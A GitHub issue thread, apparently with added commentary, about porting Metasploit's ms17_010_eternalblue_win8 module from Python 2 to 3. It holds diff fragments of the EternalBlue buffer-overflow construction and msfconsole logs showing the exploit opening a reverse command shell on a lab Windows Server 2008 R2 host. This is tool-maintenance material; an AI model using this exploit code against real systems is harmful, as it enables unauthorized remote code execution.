Closed acammack-r7 closed 3 years ago
The first issue (with the plain python shebang) looks to be due to using python 2 and having the first line of cli.py that pulls in the forwards compatibility print function removed somehow. Those errors do not occur in Python 3 or in Python 2.7 or 2.6 with the file as is in the repo.
I have confirmed the packing issues in all the Python 3 versions I have on hand, Python 3.8.2, 3.7.7, and 3.6.9. Perhaps @busterb can shed some light since he landed https://github.com/rapid7/metasploit-framework/pull/12524 where it was supposed to be converted.
@acammack-r7 To be honest, I am still a beginner and learning. So I have a question. Is it a bug that will be fixed, or is there a solution?
Welcome, @hothefa1998! I would expect that this will get fixed, or at least that there will be another way to run MS17-010 against Windows 8 & 10 era targets. The code worked well enough under Python 2 that we know it is possible to get working successfully again; it's a matter of finding where the behavior under the newer Pythons differs from the old ones and then changing it back (likely with gratuitous use of `b"..."` literals). Saying a fix is right around the corner is always risky, though, especially in open source software where there's always more work to be done than workers and priorities can change quickly.
@kal1s, looking at your output a little more, I have a couple of observations:
- Using `diff -u` makes diff output much easier to read for humans (and is the format `git` uses)
- I think we'll want to go the other direction for strings and bytes, with everything intended to go over the network needing to be `bytes` or `b'...'` literals, which was the default way 2.x treats strings.
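An added Python 3 illustration of the point above (example code written for this page, not the module's code and not from anyone in this thread): why `str(pack(...))` and `'\x00'.encode()` are not byte casts, the `TypeError: can't concat str to bytes` and `'ascii' codec can't decode byte` errors reported further down in the thread, and a bytes-only builder of the kind this comment recommends. The record format and all sample values are constructed for the example.

```python
from struct import pack


def str_of_pack_inflates(value: int) -> tuple:
    """The diff in this thread wraps pack() in str() so it concatenates with
    a '\\x00' str. In Python 3, str(bytes) is the repr text "b'...'", so the
    'cast' silently changes both the length and the content of the field."""
    raw = pack('<H', value)
    as_text = str(raw)
    return len(raw), len(as_text), as_text


def encode_is_not_a_byte_cast(s: str) -> tuple:
    """'\\x00'.encode() happens to work because NUL is ASCII, but str.encode()
    defaults to UTF-8: any escape >= 0x80 becomes two bytes. latin-1 is the
    codec that maps each code point 0..255 to exactly one byte, i.e. the
    Python 2 str semantics the module was written against."""
    return len(s.encode()), len(s.encode('latin-1')), len(s)


def mixed_concat_fails() -> str:
    """The TypeError from the Python 3 traceback in this thread: bytes from
    pack() plus a str literal. Returns the exception class name."""
    try:
        pack('<BBH', 0, 0, 0) + '\x00'
    except TypeError as e:
        return type(e).__name__
    return 'no error'


def ascii_decode_fails(data: bytes) -> str:
    """The "'ascii' codec can't decode byte" failure: binary data reaching a
    code path that treats it as ASCII text (Python 2 does this implicitly
    when a str meets a unicode). Returns the error text."""
    try:
        data.decode('ascii')
    except UnicodeDecodeError as e:
        return str(e)
    return 'decoded'


def as_bytes(x) -> bytes:
    """Explicit, byte-preserving cast used by build_record(): bytes pass
    through, str is mapped through latin-1 so '\\x89' stays one 0x89 byte."""
    if isinstance(x, bytes):
        return x
    if isinstance(x, str):
        return x.encode('latin-1')
    raise TypeError(f'expected str or bytes, got {type(x).__name__}')


def build_record(tag: int, body) -> bytes:
    """Length-prefixed record built the bytes-only way (a constructed format
    for this example, not the module's SMB structures): 1-byte tag, 2-byte
    little-endian length, body. Every piece is bytes before concatenation, so
    the length field is right even when body was written as a Py2-style str."""
    body = as_bytes(body)
    return pack('<BH', tag, len(body)) + body


if __name__ == '__main__':
    print(str_of_pack_inflates(0xfff0))          # (2, 11, "b'\\xf0\\xff'")
    print(encode_is_not_a_byte_cast('\x00\x7f\x80\xff'))  # (6, 4, 4)
    print(mixed_concat_fails())                  # TypeError
    print(ascii_decode_fails(b'AB\xd3'))
    print(build_record(0x12, '\x00\x89').hex())  # 1202000089
```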
Hi @acammack-r7, following is the `diff -u` result. What you are saying about the direction of the casting makes sense.
$ diff -u ms17_010_eternalblue_win8.py ms17_010_eternalblue_win8.py.kal1s
--- ms17_010_eternalblue_win8.py 2020-05-17 13:22:54.547224850 -0300 +++ ms17_010_eternalblue_win8.py.kal1s 2020-05-16 16:32:38.850346127 -0300 @@ -139,8 +139,8 @@ '\x11\x4d\x89\xc1\x4d\x8b\x09\x4d\x39\xc8\x0f\x84\xc6\x00\x00' '\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6' '\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'
NTFEA_SIZE = 0x9000
-ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')0x260 # with these fea, ntfea size is 0x1c80 -ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c -ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'0x8148 # overflow to SRVNET_BUFFER_HDR +ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00'.encode())0x260 # with these fea, ntfea size is 0x1c80 +ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'.encode()0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c +ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'.encode()0x8148 # overflow to SRVNET_BUFFER_HDR
''' Reverse from srvnet.sys (Win2012 R2 x64) @@ -269,20 +269,20 @@ SHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000 PTE_ADDR = 0xfffff6ffffffe800 + 8((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12) fakeSrvNetBufferX64Nx = '\x00'16 -fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) +fakeSrvNetBufferX64Nx += str(pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)) fakeSrvNetBufferX64Nx += '\x00'16 fakeSrvNetBufferX64Nx += '\x00'16 -fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) -fakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAPADDR) # , _, pointer to fake struct -fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0)) +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, TARGET_HAL_HEAPADDR)) # , _, pointer to fake struct +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0)) fakeSrvNetBufferX64Nx += '\x00'16 fakeSrvNetBufferX64Nx += '\x00'16 -fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags -fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa +fakeSrvNetBufferX64Nx += str(pack('<QHHI', 0, 0x60, 0x1004, 0)) # MDL.Next, MDL.Size, MDL.MdlFlags +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, PTE_ADDR+7-0x7f)) # MDL.Process, MDL.MappedSystemVa
feaListNx = pack('<I', 0x10000) feaListNx += ntfea9000 -feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\x00' is for name +feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx.encode() # -1 because first '\x00' is for name
feaListNx += pack('<BBH', 0x12, 0x34, 0x5678)
@@ -291,23 +291,23 @@
totalRecvSize = 0x80 + 0x180 + sc_size
fakeSrvNetBufferX64 = '\x00'*16
fakeSrvNetBufferX64 += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80)) # MDL.Process, MDL.MappedSystemVa return fakeSrvNetBufferX64
def createFeaList(sc_size): feaList = pack('<I', 0x10000) feaList += ntfea9000 fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)
feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf.encode() # -1 because first '\x00' is for name
feaList += pack('<BBH', 0x12, 0x34, 0x5678) return feaList @@ -325,14 +325,14 @@
fake_recv_struct = ('\x00'16)5 -fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) -fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60 +fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58)) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) +fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0)) # offset 0x60 fake_recv_struct += ('\x00'16)10 -fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array -fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150 -fake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130 +fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0)) # offset 0x110: fn_ptr array +fake_recv_struct += str(pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0)) # set arg1 to -0x8150 +fake_recv_struct += str(pack('<QII', 0, 0, 3)) # offset 0x130 fake_recv_struct += ('\x00'16)3 -fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address +fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)) # shellcode address
def getNTStatus(self): @@ -679,7 +679,7 @@ smbpass = args['SMBPass'] if 'SMBPass' in args else ''
sc = eternalblue_kshellcode_x64(args['ProcessName']) + str(b64decode(args['payload_encoded']))
if len(sc) > 0xe80: module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
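Review bot: in the `@@ -139,8 +139,8 @@` hunk, replacing `'\x00'` with `'\x00'.encode()` makes the three `ntfea9000` lines type-check, but `str.encode()` defaults to UTF-8 and only yields one byte here because NUL is below 0x80; applied to the `'\x11\x4d\x89...'` style strings visible in the context lines it would change their length. A `b'\x00'` literal, as suggested earlier in the thread, gives the same bytes with the intent visible in the source.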
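Review bot: in the `@@ -269,20 +269,20 @@` hunk, `str(pack(...))` goes in the wrong direction: in Python 3 `str()` of a bytes object is its repr text (`b'...'`), so each `fakeSrvNetBufferX64Nx += str(pack(...))` line appends ASCII characters rather than the packed fields, and the `len(fakeSrvNetBufferX64Nx)-1` length field plus `.encode()` in the `feaListNx` line then serialize that repr. The buffer should start as a bytes literal and stay bytes throughout, with no `str()` or `.encode()`; the same applies to the `str(pack(...))` and `.encode()` lines in the `@@ -291` and `@@ -325` hunks.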
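Review bot: in the `@@ -679,7 +679,7 @@` hunk, `str(b64decode(...))` has the same repr problem, and the `len(sc) > 0xe80` check on the next line then measures the repr length rather than the decoded payload. Keep the `b64decode()` output as bytes and have `eternalblue_kshellcode_x64()` return bytes too, so the length check measures what is actually concatenated.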
I don't know the difference between **Metasploit** from the **Kali Linux Repo** and from **Metasploit GitHub**, but yesterday I realized that the exploit **ms17_010_eternalblue** doesn't work either, and that is strange because this exploit is made in Ruby, not in Python.
So today I removed the Metasploit from the Kali Linux Repo and installed the Metasploit from the [Metasploit Framework Nightly Installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers), and now this exploit is working nicely.
Now I just need to test **ms17_010_eternalblue_win8**, which I'll do in the next few days because I'm having some problems with the Windows target.
### Steps that I did to Install Metasploit Framework Nightly on Kali Linux
- Remove, Install, and Configure:
```
msf5 > version
Framework: 5.0.90-dev-
Console  : 5.0.90-dev-
```
### Running an Attack
- Running an attack to a **Windows Server 2008 R2** using the exploit **ms17_010_eternalblue**:
```
msf5 > use windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.1.60
rhosts => 172.16.1.60
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.20.1.119:4444
[*] 172.16.1.60:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.1.60:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[*] 172.16.1.60:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.1.60:445 - Connecting to target for exploitation.
[+] 172.16.1.60:445 - Connection established for exploitation.
[+] 172.16.1.60:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.1.60:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.1.60:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.1.60:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 172.16.1.60:445 - 0x00000020  65 20 37 36 30 30                                e 7600
[+] 172.16.1.60:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.1.60:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.1.60:445 - Sending all but last fragment of exploit packet
[*] 172.16.1.60:445 - Starting non-paged pool grooming
[+] 172.16.1.60:445 - Sending SMBv2 buffers
[+] 172.16.1.60:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.1.60:445 - Sending final SMBv2 buffers.
[*] 172.16.1.60:445 - Sending last fragment of exploit packet!
[*] 172.16.1.60:445 - Receiving response from exploit packet
[+] 172.16.1.60:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.1.60:445 - Sending egg to corrupted connection.
[*] 172.16.1.60:445 - Triggering free of corrupted buffer.
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.1.60:445 - Connecting to target for exploitation.
[+] 172.16.1.60:445 - Connection established for exploitation.
[+] 172.16.1.60:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.1.60:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.1.60:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.1.60:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 172.16.1.60:445 - 0x00000020  65 20 37 36 30 30                                e 7600
[+] 172.16.1.60:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.1.60:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.1.60:445 - Sending all but last fragment of exploit packet
[*] 172.16.1.60:445 - Starting non-paged pool grooming
[+] 172.16.1.60:445 - Sending SMBv2 buffers
[+] 172.16.1.60:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.1.60:445 - Sending final SMBv2 buffers.
[*] 172.16.1.60:445 - Sending last fragment of exploit packet!
[*] 172.16.1.60:445 - Receiving response from exploit packet
[+] 172.16.1.60:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.1.60:445 - Sending egg to corrupted connection.
[*] 172.16.1.60:445 - Triggering free of corrupted buffer.
[*] Command shell session 2 opened (172.20.1.119:4444 -> 172.16.1.60:58703) at 2020-05-19 13:25:34 -0300
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>
```
### Next Steps
- In the next days I'll test the exploit **ms17_010_eternalblue_win8** and I'll let you know about the results.
@kal1s
Hi @acammack-r7, as I promised, today I tested the exploit ms17_010_eternalblue_win8 using the Metasploit Framework from the Metasploit GitHub Nightly.
This time I didn't make any changes to the exploit.
It doesn't work and I found another issue; since this issue isn't related to the Python 3 problem, I think you'll want to open another issue.
So because of that, I'll report what I found to help solve this new issue.
```
# cat /etc/os-release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2020.2"
VERSION_ID="2020.2"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
```
```
# apt show metasploit-framework
Package: metasploit-framework
Version: 5.0.90+20200520102413.git.2.33708c2~1rapid7-1
Priority: extra
Section: misc
Maintainer: Rapid7 Release Engineering <r7_re@rapid7.com>
Installed-Size: 510 MB
Homepage: https://rapid7.com
License: Unspecified
Vendor: Omnibus <omnibus@getchef.com>
Download-Size: 223 MB
APT-Manual-Installed: yes
APT-Sources: http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 Packages
Description: The full stack of metasploit-framework
```
```
msf5 > version
Framework: 5.0.90-dev-
Console  : 5.0.90-dev-
```
- **Python 2**:
```
$ python --version
Python 2.7.18
```
- **Python 3**:
```
$ python3 --version
Python 3.8.3rc1
```
### Steps to Reproduce
- Fresh Installation of the [Windows 2012 R2](https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012-r2) with the MS17-010 Vulnerability:
- On Metasploit looking for the Vulnerability:
```
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(scanner/smb/smb_ms17_010) > set smbpass **
smbpass => **
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.122.168
rhosts => 192.168.122.168
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.122.168:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter Evaluation 9600 x64 (64-bit)
[*] 192.168.122.168:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- Running the exploit `ms17_010_eternalblue_win8` against the Windows Target:
```
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue_win8
```
- Error on the `framework.log` when I executed the last command:
```
[05/20/2020 14:03:23] [e(0)] core: /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack:
/opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize'
/opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `open'
/opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content'
/opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:127:in `load_module'
/opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module'
/opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:86:in `each'
/opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module'
/opt/metasploit-framework/embedded/framework/lib/msf/core/module_set.rb:45:in `create'
/opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager.rb:90:in `create'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in `cmd_use'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:158:in `run'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `<main>'
```
- Configuring the Exploit:
```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set rhost 192.168.122.168
rhost => 192.168.122.168
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set smbpass **
smbpass => **
```
- Running the Exploit 2 times:
```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] shellcode size: 1232
[*] numGroomConn: 13
[*] Target OS: Windows Server 2012 R2 Datacenter Evaluation 9600
[*] got good NT Trans response
[*] got good NT Trans response
[-] 'ascii' codec can't decode byte 0xd3 in position 2: ordinal not in range(128)
[-] Exploit aborted due to failure: unknown: Module exited abnormally
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] shellcode size: 1232
[*] numGroomConn: 13
[*] Target OS: Windows Server 2012 R2 Datacenter Evaluation 9600
[*] got good NT Trans response
[*] got good NT Trans response
[-] 'ascii' codec can't decode byte 0x87 in position 4: ordinal not in range(128)
[-] Exploit aborted due to failure: unknown: Module exited abnormally
[*] Exploit completed, but no session was created.
```
- Each time that I execute the exploit the byte and the position change.
- No more errors in the `framework.log`.
----------------------------------------------------------------------------------------------------------------
**@kal1s**
That's a known issue with the module under Python 2. Under some circumstances something about the SMB data and impacket disagree, and a field that was assumed to be ascii is really binary. I tried looking at it once, but it can be hard to reproduce on a VM on demand, and once I could, it turned out to be a large rabbithole I didn't have time to go down. I think a full python 3 conversion could coincidentally fix it by making sure everything is properly bytes.
Originally posted by @kal1s in https://github.com/rapid7/metasploit-framework/issues/13458#issuecomment-629835823
Hi guys!
I'm having the same problem with the ms17_010_eternalblue_win8 exploit, where my Kali Linux is using Python 3 in the shebangs but the exploit doesn't work.
I needed to break some things here to understand what is happening, and I think I have made some advances.
Only changing the shebangs is not sufficient, because a lot of syntax and language features changed from Python 2 to Python 3.
It needs some porting from Python 2 to Python 3, see: https://docs.python.org/3/howto/pyporting.html
I solved some problems, but my lack of knowledge of the exploit is a roadblock for me to continue solving this problem.
I think all other exploits in Python 2 that are going to Python 3 will suffer the same problem that we are describing here.
In summary, it was necessary to change a lot of string and byte concatenations, where in Python 3 it is mandatory to cast the type to the type that is receiving the value, see: https://stackoverflow.com/questions/606191/convert-bytes-to-a-string.
So let me show you guys what I did to get a palliative and incomplete solution.
### My Versions
### Steps to Reproduce the Python2 Version
```
[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
[05/17/2020 15:10:33] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack:
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `open'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in `load_module'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `each'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module'
/usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in `create'
/usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:in `create'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in `cmd_use'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:450:in `cmd_search'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:701:in `cmd_use'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[05/17/2020 15:10:33] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 15, in <module>
    from metasploit import module
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/module.py", line 6, in <module>
    from metasploit import cli
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/cli.py", line 10
    print(*args, file=sys.stderr, **kwargs)
                     ^
SyntaxError: invalid syntax
[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
```
```
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8
[-] Invalid module: exploit/windows/smb/ms17_010_eternalblue_win8
```
```
[05/17/2020 13:14:40] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack:
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `open'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in `load_module'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `each'
/usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module'
/usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in `create'
/usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:in `create'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:162:in `block in cmd_info'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:in `each'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:in `cmd_info'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[05/17/2020 13:14:40] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in <module>
    ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to bytes
[05/17/2020 13:14:40] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
```
$ diff ms17_010_eternalblue_win8.py ms17_010_eternalblue_win8.py.kal1s
142,143c142,143 < '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + proc_hash + < '\x74\x10\x3d' + proc_hash + '\x74\x09\x48\x8b\x0c'
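Review bot: the `142,143c142,143` hunk shows only the old (`<`) side of the two `proc_hash` lines; the replacement (`>`) lines are missing from the paste, so what changed in this hunk cannot be reviewed here. Pasting the `diff -u` form, as requested earlier in the thread, would also keep both sides together with context.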
```
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8

  Platform: Windows
      Arch: x64
Privileged: Yes
   License: Metasploit Framework License (BSD)
      Rank: Average
 Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   win x64

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
